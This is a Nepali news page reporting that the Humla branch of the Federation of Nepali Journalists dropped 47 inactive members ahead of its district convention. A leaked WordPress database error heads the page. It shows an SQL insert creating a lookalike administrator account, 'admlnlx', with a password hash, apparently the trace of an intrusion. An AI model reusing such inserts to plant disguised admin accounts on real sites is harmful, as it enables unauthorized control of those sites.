WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bu2AjsXHz/7qIeMozSDFCiNYPmQe5.1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:34:14', '', 'admlnlx', 'admlnlx')
कचहरी डट कम, हुम्ला ।। नेपाल पत्रकार महासंघ, जिल्ला शाखा हुम्लाले पत्रकारितालाई व्यवसायी र मर्यादीत बनाउन शुद्धिकरण अभियान अन्तर्गत ४७ जना निश्क्रिय पत्रकारहरुलाई महासंघको सदस्यबाट विदाइ गरेको छ ।
विभिन्न समयमा विभिन्न कारणले पत्रकारिता पेशामा सक्रिय नरहेका तर महासंघको सदस्य भएका ४७ जनालाई विदाई गरी क्रियाशिल २८ जनालाई निरन्तरता दिने जिल्ला शाखा हुम्लाको सर्बसम्मतीले निर्णय गरेको जानकारी उक्त शाखाका सचिव नृपराज हमालले दिएका छन् ।
जिल्ला शाखा हुम्लामा ७५ जना सदस्य रहेको थिए । जिल्लामा रहेका पत्रकाररिता क्षेत्रका संघ, संगठनहरुको बिहिवार बसेको संयुक्त बैठकले व्यवसायिक पत्रकारीताका लागि निश्क्रिय पत्रकारहरुलाई विदाई गर्ने निर्णय गरे बमोजिम नेपाल पत्रकार महासंघ, हुम्लाले शुद्धिकरण अभियान सञ्चालन गरेको हो । उक्त बैठकमा प्रेस सेन्टर नेपालका केन्द्रीय सदस्य अर्जुन वोहरा, प्रेस युनियनका अध्यक्ष राजन रावत र प्रेस चौतारीका अध्यक्ष नृपराज हमालको संयुक्त बैठकले छानविन गरी सहमतीका आधारमा विदाई गरिएको छ ।
आगामी फागुन २६ गते हुन गइरहेको शाखाको छैटौं जिल्ला अधिवेशन सम्पन्न गर्न बसेको महासंघको वैठकले सदस्यता सुदृढिकरण अभियान गरी व्यवासायिकतालाई जोड दिएको छ । । नेपाल पत्रकार महासंघको नयाँ सदस्यता वितरणमा देशभर विवाद भए पनि हुम्लामा शुद्धिकरण अभियानलाई सफल बनाउन समन्वय, सहकार्य र सहअस्तित्वलाई सम्मान गर्दै अगाडी बढ्ने सकरात्मक कामको सिको केन्द्रले पनि सिक्ने हो कि ?